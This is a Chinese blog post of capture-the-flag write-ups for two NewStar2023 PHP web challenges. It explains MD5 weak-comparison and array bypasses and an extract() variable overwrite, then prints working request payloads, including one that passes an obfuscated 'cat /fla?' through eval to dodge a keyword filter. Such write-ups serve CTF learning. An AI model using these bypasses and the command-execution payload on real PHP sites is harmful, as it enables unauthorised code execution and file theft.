<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="允许一切如其所是">
    <meta name="author" content="C3ngH">
    
    <title>
        
            一些WriteUp |
        
        C3ngH&#39;s B10g
    </title><meta name="robots" content="noindex">
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/favicon.ico">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"c3ngh.top","root":"/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"C3ngH's B10g","author":"C3ngH","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/C3ngH.jpg","logo":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/C3ngH.jpg","favicon":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/favicon.ico"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","links":"/links"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"CTF Misc / A1natas Team / V＆N Team / More","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://github.com/zch050217","weixin":null,"qq":"./images/qqQRcode.jpg","weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":true,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":true,"use":"waline","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.36"},"waline":{"server_url":"https://blog-waline-weld.vercel.app/","reaction":false,"version":"3.2.1"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2023,"word_count":true,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{"links":[{"title":"A1natas's Teammates"},{"name":"Lunatic - Misc指路人@星盟安全团队&ChaMD5","link":"https://goodlunatic.github.io/","description":"Mind and Hand :)","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/Lunatic.png"},{"name":"A1ic3 - Crypto@V&N","link":"https://a1ic3.cn/","description":"希望成为一个有趣的人","avatar":"https://www.a1ic3.cn/avatar.png"},{"name":"PangBai - Reverse@W&M","link":"https://pangbai.work/","description":"世上所有不利都是当事人无能所致","avatar":"http://pangbai.work/images/avatar.jpg"},{"name":"void2eye - Web@WpgSec狼族安全","link":"https://void2eye.fun/","description":"临渊羡鱼，不如退而结网。","avatar":"https://sl0wjamz.oss-cn-hangzhou.aliyuncs.com/img/808.png"},{"name":"carbofish - 全栈&运维&开发&all in one","link":"https://carbo.ink/","description":"lfy,wcnm!","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/CarboFish.jpg"},{"name":"AsaL1n - Web@V&N","link":"https://asal1n.github.io/","description":"why we need that?","avatar":"https://asal1n.github.io/img/head.jpg"},{"name":"enllus1on - Pwn@Nu1L","link":"https://enllus1on.github.io/","description":"pwn for more","avatar":"https://enllus1on.github.io/images/kano.jpg"},{"name":"Straw - Reverse","link":"https://straw-233.github.io/","description":"午门痴","avatar":"https://straw-233.github.io/avatar/meinasi.png"},{"name":"CHHHCHHOH - Web","link":"https://chhhchhoh.cn/","description":"吃了乙酸的乙醇会不会梦到乙酸乙酯？","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/zyc.png"},{"name":"WoodWhale - 全栈@r3kapig","link":"https://woodwhale.cn/","description":"A happy woodwhale!","avatar":"https://www.woodwhale.cn/woodwhale.png"},{"name":"XunFlash - Reverse","link":"https://www.xunflash.top/","description":"你好","avatar":"https://www.xunflash.top/icon.png"},{"name":"huanghunr - Reverse","link":"https://blog.huanghunr.top","description":"喵喵喵?!还没想好","avatar":"https://huanghunr-blog.oss-cn-hangzhou.aliyuncs.com/tx%20%283%29.jpg"},{"name":"温婳霂 - Misc","link":"https://somokel.github.io","description":"春祺夏安，秋绥冬宁。","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/wenhuamu.jpg"},{"name":"MetaVi","link":"https://metaviii.github.io","description":"Add a touch of fantasy?","avatar":"https://s2.loli.net/2024/12/04/jJpynvQUCA3RlIG.jpg"},{"title":"V&N's Teammates"},{"name":"Aecous","link":"https://aecous.github.io/","description":"web✌","avatar":"https://aecous.github.io/images/me.png"},{"title":"Other CTFer"},{"name":"sheep","link":"https://s1nec-1o.github.io/","description":"努力学习的pwner(ROIS✌","avatar":"https://cdn.jsdelivr.net/gh/BAMBOOiii/photo@main/img/202404281614288.png"},{"name":"LilRan","link":"https://blog.xinshi.fun/","description":"今日启程 无畏向前","avatar":"https://blog.xinshi.fun/assets/avatar.png"},{"title":"战队"},{"name":"A1natas","link":"https://www.a1natas.com/","description":"ZJNU A1natas Group","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/A1natas.png"},{"name":"V&N","link":"https://vnteam.cn/","description":"V&N Union CTF Team","avatar":"https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/VN.png"}]},"version":"4.2.2"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/C3ngH.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               C3ngH&#39;s B10g
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/links">
                                
                                友链
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/links">
                            
                            友链
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        一些WriteUp
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/C3ngH.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">C3ngH</span>
                                
                                    <span class="author-badge">Lv3</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2023-10-17 09:59:30</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Wed Nov 20 2024 18:52:54 GMT+0800">2024-11-20 18:52:54</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/CTF/">CTF</a></li>
                        
                    
                </ul>
            </span>
        

        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3.6k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>16 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h2 id="NewStar2023-Begin-Of-PHP">[NewStar2023]Begin Of PHP</h2>
<p>Level 1 MD5弱类型比较：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;=Level 1=&lt;br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key1&#x27;</span>] !== <span class="variable">$_GET</span>[<span class="string">&#x27;key2&#x27;</span>] &amp;&amp; <span class="title function_ invoke__">md5</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key1&#x27;</span>]) == <span class="title function_ invoke__">md5</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key2&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$flag1</span> = True;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;nope,this is level 1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>根据PHP语言特性：==为弱类型比较，===为强类型比较</p>
<p>a==b：弱类型比较会将a和b转成统一数据类型在进行比较，而强类型比较会先判断a和b是不是相同类型，不是，则返回false，是，再比较a和b的值。</p>
<p>根据该特性，有以下几种绕过方法：</p>
<ol>
<li>
<p>0e绕过：</p>
<p>弱类型比较会把0exxxxx作为科学计数法，无论xxx为何值，0的任何次幂都为0，故科学计数法的值相同，以下字符串的MD5值相同</p>
<p>s878926199a 0e545993274517709034328855841020</p>
<p>s155964671a 0e342768416822451524974117254469</p>
<p>s214587387a 0e848240448830537924465865611904</p>
<p>s214587387a 0e848240448830537924465865611904</p>
<p>s878926199a 0e545993274517709034328855841020</p>
<p>s1091221200a 0e940624217856561557816327384675</p>
<p>s1885207154a 0e509367213418206700842008763514</p>
<p>s1502113478a 0e861580163291561247404381396064</p>
<p>s1885207154a 0e509367213418206700842008763514</p>
<p>s1836677006a 0e481036490867661113260034900752</p>
<p>s155964671a 0e342768416822451524974117254469</p>
<p>s1184209335a 0e072485820392773389523109082030</p>
<p>s1665632922a 0e731198061491163073197128363787</p>
<p>s1502113478a 0e861580163291561247404381396064</p>
<p>s1836677006a 0e481036490867661113260034900752</p>
<p>s1091221200a 0e940624217856561557816327384675</p>
<p>s155964671a 0e342768416822451524974117254469</p>
<p>s1502113478a 0e861580163291561247404381396064</p>
<p>s155964671a 0e342768416822451524974117254469</p>
<p>s1665632922a 0e731198061491163073197128363787</p>
<p>s155964671a 0e342768416822451524974117254469</p>
<p>s1091221200a 0e940624217856561557816327384675</p>
<p>s1836677006a 0e481036490867661113260034900752</p>
<p>s1885207154a 0e509367213418206700842008763514</p>
<p>s532378020a 0e220463095855511507588041205815</p>
<p>s878926199a 0e545993274517709034328855841020</p>
<p>s1091221200a 0e940624217856561557816327384675</p>
<p>s214587387a 0e848240448830537924465865611904</p>
<p>s1502113478a 0e861580163291561247404381396064</p>
<p>s1091221200a 0e940624217856561557816327384675</p>
<p>s1665632922a 0e731198061491163073197128363787</p>
<p>s1885207154a 0e509367213418206700842008763514</p>
<p>s1836677006a 0e481036490867661113260034900752</p>
<p>s1665632922a 0e731198061491163073197128363787</p>
<p>s878926199a 0e545993274517709034328855841020</p>
</li>
<li>
<p>数组绕过：</p>
<p>md5()函数计算的是一个字符串的哈希值，对于数组则返回false。</p>
<p><strong>注：弱遇到MD5强类型比较，可使用MD5完全相同的两个字符串进行绕过，也可使用数组进行绕过</strong></p>
</li>
</ol>
<p>Level 2 强类型比较：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$flag1</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;=Level 2=&lt;br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;key3&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;key3&#x27;</span>]) === <span class="title function_ invoke__">sha1</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;key3&#x27;</span>]))&#123;</span><br><span class="line">            <span class="variable">$flag2</span> = True;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;nope,this is level 2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可使用数组绕过</p>
<p>Level 3：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$flag2</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;=Level 3=&lt;br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key4&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strcmp</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key4&#x27;</span>],<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;/flag&quot;</span>)) == <span class="number">0</span>)&#123;</span><br><span class="line">            <span class="variable">$flag3</span> = True;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;nope,this is level 3&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>strcmp(str1,str2)函数是比较两个字符串，若字符串相等则输出1，＜0则str1＜str2，反则反之。</p>
<p>file_get_contents()函数会将文件读取到字符串中。</p>
<p>若strcmp传入数值为数组，则会返回NULL，构造NULL==0即可绕过</p>
<p><strong>注：如果strcmp函数中存在一个数组，整个函数的输出值将会直接为0，不需再进行字符串比较</strong></p>
<p>Level 4：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$flag3</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;=Level 4=&lt;br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key5&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">is_numeric</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key5&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;key5&#x27;</span>] &gt; <span class="number">2023</span>)&#123;</span><br><span class="line">            <span class="variable">$flag4</span> = True;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;nope,this is level 4&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>is_numeric()</strong> 函数用于检测变量是否为数字或数字字符串。如果指定的变量是数字和数字字符串则返回 TRUE，否则返回 FALSE，注意浮点型返回 1，即 TRUE。</p>
<p>则在key5后增加任何字母即可绕过，如2024a会在与2023比较时被视为2024</p>
<p>Level 5：过滤了字母和数字，可以采用数组或任意字符进行绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$flag4</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;=Level 5=&lt;br&gt;&quot;</span>;</span><br><span class="line">    <span class="title function_ invoke__">extract</span>(<span class="variable">$_POST</span>);</span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$var</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[a-zA-Z0-9]/&quot;</span>,<span class="variable">$var</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;nope,this is level 5&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$flag5</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;/flag&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;nope,this is level 5&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>本层为extract函数导致的变量覆盖漏洞，这里的if判断只要保证传入变量flag5即可，根据上面的正则限制，变量值不能为字母和数字，那么传入一个任意符号即可通过本层。也可传入 flag5[]=1，上方无法检测到数据，下方 if 语句条件为 1，为真，得到 flag。</p>
<p>payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">key1=QNKCDZO&amp;key2=240610708&amp;key4[]=2&amp;key5=2024a</span><br><span class="line">    </span><br><span class="line">POST: key3[]=1&amp;flag5=?</span><br></pre></td></tr></table></figure>
<h2 id="NewStar2023-RCE">[NewStar2023]RCE</h2>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;e_v.a.l&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$password</span>=<span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]);</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;e_v.a.l&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$password</span>,<span class="number">0</span>,<span class="number">6</span>)===<span class="string">&quot;c4d038&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag|system|pass|cat|ls/i&quot;</span>,<span class="variable">$code</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>本题要求password的前6位为c4d038，可以使用脚本进行枚举得到结果：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_string_with_prefix</span>(<span class="params">prefix, length</span>):</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="comment"># 生成随机字符串</span></span><br><span class="line">        random_string = <span class="string">&#x27;&#x27;</span>.join(random.choice(string.ascii_letters + string.digits) <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(length))</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 计算字符串的MD5哈希值</span></span><br><span class="line">        md5_hash = hashlib.md5(random_string.encode()).hexdigest()</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 检查哈希值的前缀是否匹配</span></span><br><span class="line">        <span class="keyword">if</span> md5_hash.startswith(prefix):</span><br><span class="line">            <span class="keyword">return</span> random_string</span><br><span class="line"></span><br><span class="line"><span class="comment"># 生成一个满足条件的字符串</span></span><br><span class="line">prefix = <span class="string">&quot;c4d038&quot;</span></span><br><span class="line">desired_length = <span class="number">10</span>  <span class="comment"># 你可以根据需要设置字符串的长度</span></span><br><span class="line">result_string = generate_string_with_prefix(prefix, desired_length)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;生成的字符串:&quot;</span>, result_string)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;MD5哈希值:&quot;</span>, hashlib.md5(result_string.encode()).hexdigest())</span><br></pre></td></tr></table></figure>
<p>举例结果：N5ObQ0buWi</p>
<p>也可以使用数字：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line">prefix = <span class="string">&quot;c4d038&quot;</span></span><br><span class="line">target_hash = prefix.lower()</span><br><span class="line"></span><br><span class="line">number = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="comment"># 将数字转换为字符串并计算 MD5 哈希</span></span><br><span class="line">    number_str = <span class="built_in">str</span>(number)</span><br><span class="line">    hash_object = hashlib.md5(number_str.encode())</span><br><span class="line">    hash_hex = hash_object.hexdigest()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 检查哈希是否与目标前缀匹配</span></span><br><span class="line">    <span class="keyword">if</span> hash_hex.startswith(target_hash):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;找到匹配的数字：&quot;</span>, number_str)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    number += <span class="number">1</span></span><br></pre></td></tr></table></figure>
<p>举例结果：114514</p>
<p><strong>本题重点：e_v.a.l</strong>：若直接传递参数e_v.a.l则会报错，应改为e[v.a.l，原因如下：</p>
<p>PHP 在处理字符串时，会对一些特殊字符进行转义，以防止注入攻击或破坏语法结构。当 PHP 遇到字符串中的 “.” 时,通常会把它转换成 “<em>”。这是为了防止通过字符串传入一些可 能破坏语法的内容。 但是如果 “.” 被放在&quot;[]“中,PHP 就会认为这是一个数组索引的语法，不会进行转义。 所以： e_v.a.l 中的 “.” 被转义为 “</em>”， e[v.a.l] 中的 “.” 没有被转义,因为它在”[]&quot;中，PHP 认为这是数组语法的一部分</p>
<p>总结一下: 纯字符串中遇到&quot;.&quot; 会被转义为&quot;_&quot; ， 在[]中遇到&quot;.&quot; 不会被转义，会保留原样，这是 PHP 的一个安全机制，目的是防止通过字符串突破语法结构或者注入攻击。放在[]中的内容会被认为是数组语法的一部分，所以不会进行转义</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=114514&amp;e[v.a.l=echo exec(&quot;c&#x27;a&#x27;t /fla?&quot;);</span><br></pre></td></tr></table></figure>
